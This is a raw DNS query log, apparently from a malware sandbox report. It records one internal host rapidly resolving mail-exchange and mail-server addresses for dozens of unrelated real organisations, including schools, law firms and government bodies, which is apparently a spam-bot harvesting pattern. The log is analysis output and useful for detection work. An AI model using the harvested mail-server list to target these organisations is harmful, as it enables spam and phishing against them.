                                                                                                                                                                                                    Nov 26, 2023 06:59:28.961322069 CET1.1.1.1192.168.2.40xbfe7No error (0)student.debritto.sch.id117.20.63.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.987329006 CET1.1.1.1192.168.2.40x4aa9Name error (3)heathcotebarr.eunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.996145964 CET1.1.1.1192.168.2.40xb7f1Name error (3)elitebusinesshn.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.018095016 CET1.1.1.1192.168.2.40x8de4No error (0)hightideinc.com104.26.12.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.018095016 CET1.1.1.1192.168.2.40x8de4No error (0)hightideinc.com172.67.69.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.018095016 CET1.1.1.1192.168.2.40x8de4No error (0)hightideinc.com104.26.13.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.025537014 CET1.1.1.1192.168.2.40x335dName error (3)xtsagency.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.027364016 CET1.1.1.1192.168.2.40xc3bcNo error (0)daisyokogyo.co.jp202.226.37.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.098124027 CET1.1.1.1192.168.2.40xdfa9No error (0)wonka.ccMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.098124027 CET1.1.1.1192.168.2.40xdfa9No error (0)wonka.ccMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.098124027 CET1.1.1.1192.168.2.40xdfa9No error (0)wonka.ccMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.118824959 CET1.1.1.1192.168.2.40x5d7aNo error (0)goldenfishcompany.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.118824959 CET1.1.1.1192.168.2.40x5d7aNo error (0)goldenfishcompany.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.118824959 CET1.1.1.1192.168.2.40x5d7aNo error (0)goldenfishcompany.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.118824959 CET1.1.1.1192.168.2.40x5d7aNo error (0)goldenfishcompany.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.118824959 CET1.1.1.1192.168.2.40x5d7aNo error (0)goldenfishcompany.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.118854046 CET1.1.1.1192.168.2.40xb749No error (0)gatewaytoearlylearning.com199.34.228.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.159281969 CET1.1.1.1192.168.2.40xada8Server failure (2)schmith.netnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.179234028 CET1.1.1.1192.168.2.40x8f2cNo error (0)esoft.academy172.67.132.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.179234028 CET1.1.1.1192.168.2.40x8f2cNo error (0)esoft.academy104.21.12.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.210630894 CET1.1.1.1192.168.2.40xdfa9No error (0)wonka.ccMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.210630894 CET1.1.1.1192.168.2.40xdfa9No error (0)wonka.ccMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.210630894 CET1.1.1.1192.168.2.40xdfa9No error (0)wonka.ccMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.219607115 CET1.1.1.1192.168.2.40xd7daNo error (0)grantstech.io185.135.132.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.258215904 CET1.1.1.1192.168.2.40xa7c6No error (0)gstudent.ctu.edu.vnMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.258215904 CET1.1.1.1192.168.2.40xa7c6No error (0)gstudent.ctu.edu.vnMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.258215904 CET1.1.1.1192.168.2.40xa7c6No error (0)gstudent.ctu.edu.vnMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.258215904 CET1.1.1.1192.168.2.40xa7c6No error (0)gstudent.ctu.edu.vnMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.258215904 CET1.1.1.1192.168.2.40xa7c6No error (0)gstudent.ctu.edu.vnMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.295702934 CET1.1.1.1192.168.2.40x7af8Name error (3)tnav.runonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.346560001 CET1.1.1.1192.168.2.40xb43bNo error (0)belongfbg.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.429347992 CET1.1.1.1192.168.2.40x50b3No error (0)dkrs.gov.uaMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.465382099 CET1.1.1.1192.168.2.40x50b3No error (0)dkrs.gov.uaMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.468117952 CET1.1.1.1192.168.2.40x6497Name error (3)5.e9mbw4ghnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.469542027 CET1.1.1.1192.168.2.40x8d47No error (0)nyklawfirm.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.470266104 CET1.1.1.1192.168.2.40x4b95Name error (3)matttux.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.500624895 CET1.1.1.1192.168.2.40x10cdNo error (0)healteas.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.527287960 CET1.1.1.1192.168.2.40xc771Name error (3)bayambnag.gov.phnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.533746004 CET1.1.1.1192.168.2.40xd26dNo error (0)saudi-jamac.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.534279108 CET1.1.1.1192.168.2.40xf28eNo error (0)avient-com.mail.protection.outlook.com52.101.8.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.534279108 CET1.1.1.1192.168.2.40xf28eNo error (0)avient-com.mail.protection.outlook.com52.101.9.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.534279108 CET1.1.1.1192.168.2.40xf28eNo error (0)avient-com.mail.protection.outlook.com52.101.42.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.534279108 CET1.1.1.1192.168.2.40xf28eNo error (0)avient-com.mail.protection.outlook.com52.101.9.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.534279108 CET1.1.1.1192.168.2.40xf28eNo error (0)avient-com.mail.protection.outlook.com52.101.11.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.534279108 CET1.1.1.1192.168.2.40xf28eNo error (0)avient-com.mail.protection.outlook.com52.101.8.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.534279108 CET1.1.1.1192.168.2.40xf28eNo error (0)avient-com.mail.protection.outlook.com52.101.9.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.537586927 CET1.1.1.1192.168.2.40x797bNo error (0)coimbrausa.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.559037924 CET1.1.1.1192.168.2.40x5b24No error (0)aoiit-store.mail.protection.outlook.com52.101.11.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.559037924 CET1.1.1.1192.168.2.40x5b24No error (0)aoiit-store.mail.protection.outlook.com52.101.9.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.559037924 CET1.1.1.1192.168.2.40x5b24No error (0)aoiit-store.mail.protection.outlook.com52.101.9.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.559037924 CET1.1.1.1192.168.2.40x5b24No error (0)aoiit-store.mail.protection.outlook.com52.101.42.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.559037924 CET1.1.1.1192.168.2.40x5b24No error (0)aoiit-store.mail.protection.outlook.com52.101.11.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.559037924 CET1.1.1.1192.168.2.40x5b24No error (0)aoiit-store.mail.protection.outlook.com52.101.40.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.559037924 CET1.1.1.1192.168.2.40x5b24No error (0)aoiit-store.mail.protection.outlook.com52.101.9.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.568041086 CET1.1.1.1192.168.2.40xd4ffNo error (0)vivanettv.co.keMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.850644112 CET1.1.1.1192.168.2.40x4ed3Name error (3)foundtoo.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.901928902 CET1.1.1.1192.168.2.40x4cf1No error (0)aspmx.l.google.com142.251.16.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.902010918 CET1.1.1.1192.168.2.40x3d24No error (0)route3.mx.cloudflare.net162.159.205.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.902010918 CET1.1.1.1192.168.2.40x3d24No error (0)route3.mx.cloudflare.net162.159.205.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.902010918 CET1.1.1.1192.168.2.40x3d24No error (0)route3.mx.cloudflare.net162.159.205.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.908945084 CET1.1.1.1192.168.2.40x29eaNo error (0)mx00.1and1.com74.208.5.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.909527063 CET1.1.1.1192.168.2.40x224cNo error (0)ASPMX5.GOOGLEMAIL.com142.250.153.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.911040068 CET1.1.1.1192.168.2.40xd6a2No error (0)capforge.com67.205.16.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.912988901 CET1.1.1.1192.168.2.40x6307No error (0)mx.mail-data.net143.244.202.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.923633099 CET1.1.1.1192.168.2.40x789cNo error (0)alt3.aspmx.l.google.com142.250.27.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.923898935 CET1.1.1.1192.168.2.40x5fdcNo error (0)mx2.zoho.com136.143.191.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.927558899 CET1.1.1.1192.168.2.40xf676No error (0)d405642.a.ess.ca.barracudanetworks.com15.222.16.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.927558899 CET1.1.1.1192.168.2.40xf676No error (0)d405642.a.ess.ca.barracudanetworks.com15.222.16.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.927558899 CET1.1.1.1192.168.2.40xf676No error (0)d405642.a.ess.ca.barracudanetworks.com15.222.16.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.993751049 CET1.1.1.1192.168.2.40xebe4No error (0)krkconcord-com.mail.protection.outlook.com104.47.74.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.993751049 CET1.1.1.1192.168.2.40xebe4No error (0)krkconcord-com.mail.protection.outlook.com104.47.73.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.074651957 CET1.1.1.1192.168.2.40x5ac7No error (0)beachrecruitment.com95.168.220.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.084028006 CET1.1.1.1192.168.2.40x9431No error (0)mail.gasp-ga.com162.241.224.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.096333981 CET1.1.1.1192.168.2.40x83abNo error (0)gccb.co.in164.52.221.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.125236034 CET1.1.1.1192.168.2.40x9e55Name error (3)highstreet-re.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.172692060 CET1.1.1.1192.168.2.40x3363No error (0)gmailvz.com3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.172692060 CET1.1.1.1192.168.2.40x3363No error (0)gmailvz.com15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.176055908 CET1.1.1.1192.168.2.40xad7bName error (3)kvsroraipur.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.179639101 CET1.1.1.1192.168.2.40x8d0cNo error (0)srmist.edu.in13.234.155.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.179639101 CET1.1.1.1192.168.2.40x8d0cNo error (0)srmist.edu.in35.154.156.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.185205936 CET1.1.1.1192.168.2.40x4ae5No error (0)alt4.gmr-smtp-in.l.google.com142.250.153.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.189024925 CET1.1.1.1192.168.2.40x43f7No error (0)unaj.edu.pe15.235.14.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.190057039 CET1.1.1.1192.168.2.40x2255No error (0)alt1.aspmx.l.google.com209.85.202.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.192444086 CET1.1.1.1192.168.2.40x6ac1No error (0)mx.trouble-free.net66.45.228.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.194106102 CET1.1.1.1192.168.2.40xa6f6No error (0)mx-biz.mail.am0.yahoodns.net67.195.204.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.194106102 CET1.1.1.1192.168.2.40xa6f6No error (0)mx-biz.mail.am0.yahoodns.net67.195.228.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.194207907 CET1.1.1.1192.168.2.40x5341No error (0)mailstore1.secureserver.net216.69.141.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.194207907 CET1.1.1.1192.168.2.40x5341No error (0)mailstore1.secureserver.net68.178.213.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.194207907 CET1.1.1.1192.168.2.40x5341No error (0)mailstore1.secureserver.net68.178.213.243A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.194843054 CET1.1.1.1192.168.2.40x5c48No error (0)mx1.emailsrvr.com146.20.161.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.205208063 CET1.1.1.1192.168.2.40x453aName error (3)y3.qj51acpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.218739986 CET1.1.1.1192.168.2.40x7e47No error (0)nakupher.cz37.157.195.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.222435951 CET1.1.1.1192.168.2.40x5ff4No error (0)2brosandahosepressurewashing.com185.230.63.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.222435951 CET1.1.1.1192.168.2.40x5ff4No error (0)2brosandahosepressurewashing.com185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.222435951 CET1.1.1.1192.168.2.40x5ff4No error (0)2brosandahosepressurewashing.com185.230.63.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.222946882 CET1.1.1.1192.168.2.40xa4baName error (3)ardcrushing.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.224950075 CET1.1.1.1192.168.2.40x91a4Name error (3)mnit.uc.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.227188110 CET1.1.1.1192.168.2.40xe9acNo error (0)viidelta.com89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.228604078 CET1.1.1.1192.168.2.40x7e1cNo error (0)quipuapp.com15.236.29.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.228604078 CET1.1.1.1192.168.2.40x7e1cNo error (0)quipuapp.com15.236.187.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.232495070 CET1.1.1.1192.168.2.40x7db7No error (0)ce-logic.com54.83.33.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.238394022 CET1.1.1.1192.168.2.40x44e9No error (0)engel-firm.com45.40.150.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.252616882 CET1.1.1.1192.168.2.40x768fNo error (0)octetpowers-in.mail.protection.outlook.com104.47.74.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.263993979 CET1.1.1.1192.168.2.40x38cdNo error (0)exchange.integral.bg78.128.62.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.288613081 CET1.1.1.1192.168.2.40xf0dbNo error (0)jamiesonmullin-com.mail.protection.outlook.com104.47.75.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.288613081 CET1.1.1.1192.168.2.40xf0dbNo error (0)jamiesonmullin-com.mail.protection.outlook.com104.47.75.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.288826942 CET1.1.1.1192.168.2.40x88c6No error (0)dkrs.gov.ua185.154.212.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.295006037 CET1.1.1.1192.168.2.40x365dName error (3)matttux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.295388937 CET1.1.1.1192.168.2.40x95a0No error (0)tiswheels.com34.136.104.255A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.295789957 CET1.1.1.1192.168.2.40xbb0aNo error (0)webstamp.ca72.167.58.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.304372072 CET1.1.1.1192.168.2.40x26No error (0)ceuandalucia.es213.0.13.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.305685043 CET1.1.1.1192.168.2.40x9c69No error (0)maxiv.lu.se194.47.252.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.316277981 CET1.1.1.1192.168.2.40x7c1fNo error (0)belongfbg.com35.164.64.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.361284018 CET1.1.1.1192.168.2.40x1974Name error (3)tnav.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.383554935 CET1.1.1.1192.168.2.40x46f5No error (0)samson.pe172.96.186.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.394875050 CET1.1.1.1192.168.2.40xc62dNo error (0)harasduberry.com99.81.150.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.396716118 CET1.1.1.1192.168.2.40xa02eName error (3)dbschooldelhi.ac.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.414962053 CET1.1.1.1192.168.2.40x4b4fNo error (0)tcetmumbai.in162.144.64.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.432374954 CET1.1.1.1192.168.2.40xb7c8No error (0)grg17geblergasse.at81.19.159.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.444453001 CET1.1.1.1192.168.2.40x69c6No error (0)beachrecruitment.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.444464922 CET1.1.1.1192.168.2.40x69c6No error (0)beachrecruitment.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.449601889 CET1.1.1.1192.168.2.40xc58bNo error (0)robinsonland.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.449601889 CET1.1.1.1192.168.2.40xc58bNo error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.449601889 CET1.1.1.1192.168.2.40xc58bNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.449601889 CET1.1.1.1192.168.2.40xc58bNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.453619003 CET1.1.1.1192.168.2.40xf3a8No error (0)svenssonfriends.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.453619003 CET1.1.1.1192.168.2.40xf3a8No error (0)svenssonfriends.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.467883110 CET1.1.1.1192.168.2.40x5341No error (0)perrisesd.org52.206.191.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.471218109 CET1.1.1.1192.168.2.40x6949No error (0)coralparkchristian.org162.210.96.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.477662086 CET1.1.1.1192.168.2.40x533fName error (3)member3.co.zanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.514998913 CET1.1.1.1192.168.2.40xc95eNo error (0)kappablu.de81.169.145.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.532721996 CET1.1.1.1192.168.2.40x69c6No error (0)beachrecruitment.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.540613890 CET1.1.1.1192.168.2.40x129cNo error (0)locandafrancigena.it35.214.252.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.554291964 CET1.1.1.1192.168.2.40xf215Name error (3)heathcotebarr.eunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.562598944 CET1.1.1.1192.168.2.40xaa3dServer failure (2)bosworthacademy.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.569340944 CET1.1.1.1192.168.2.40xf2abName error (3)elitebusinesshn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.593885899 CET1.1.1.1192.168.2.40x4010No error (0)digdig.org133.130.97.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.615838051 CET1.1.1.1192.168.2.40xda13No error (0)leeberg.dk104.21.63.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.615838051 CET1.1.1.1192.168.2.40xda13No error (0)leeberg.dk172.67.150.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.639262915 CET1.1.1.1192.168.2.40x68b0Name error (3)5.e9mbw4ghnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.689471960 CET1.1.1.1192.168.2.40xd17dNo error (0)awb-apparatebau.de81.169.145.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.738146067 CET1.1.1.1192.168.2.40x8cceNo error (0)upn.peMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.738225937 CET1.1.1.1192.168.2.40x8cceNo error (0)upn.peMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.738240957 CET1.1.1.1192.168.2.40x8cceNo error (0)upn.peMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.839003086 CET1.1.1.1192.168.2.40x406bServer failure (2)schmith.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.852579117 CET1.1.1.1192.168.2.40x9c7bNo error (0)vivanettv.co.ke104.247.74.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.011378050 CET1.1.1.1192.168.2.40x265dNo error (0)financefast.com.br191.252.51.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.028347969 CET1.1.1.1192.168.2.40x9a85No error (0)nyklawfirm.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.028347969 CET1.1.1.1192.168.2.40x9a85No error (0)nyklawfirm.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.036547899 CET1.1.1.1192.168.2.40x9b8fNo error (0)saudi-jamac.com76.223.105.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.036547899 CET1.1.1.1192.168.2.40x9b8fNo error (0)saudi-jamac.com13.248.243.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.041704893 CET1.1.1.1192.168.2.40xa456No error (0)federwild.at185.183.156.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.043732882 CET1.1.1.1192.168.2.40xf3c1No error (0)park-mx.above.com103.224.212.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.049370050 CET1.1.1.1192.168.2.40x4aaeNo error (0)aspmx2.googlemail.com209.85.202.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.065133095 CET1.1.1.1192.168.2.40x3674No error (0)alt2.aspmx.l.google.com64.233.184.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.067452908 CET1.1.1.1192.168.2.40x37faNo error (0)mx1.improvmx.com15.236.236.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.067452908 CET1.1.1.1192.168.2.40x37faNo error (0)mx1.improvmx.com35.181.18.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.067452908 CET1.1.1.1192.168.2.40x37faNo error (0)mx1.improvmx.com13.37.195.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.077907085 CET1.1.1.1192.168.2.40x4c76No error (0)mail.lumaruniformes.com162.241.62.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.079096079 CET1.1.1.1192.168.2.40xe330No error (0)mx195.m1bp.com164.90.197.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.079096079 CET1.1.1.1192.168.2.40xe330No error (0)mx195.m1bp.com164.90.197.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.079096079 CET1.1.1.1192.168.2.40xe330No error (0)mx195.m1bp.com147.182.130.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.079096079 CET1.1.1.1192.168.2.40xe330No error (0)mx195.m1bp.com147.182.160.18A (IP address)IN (0x0001)false
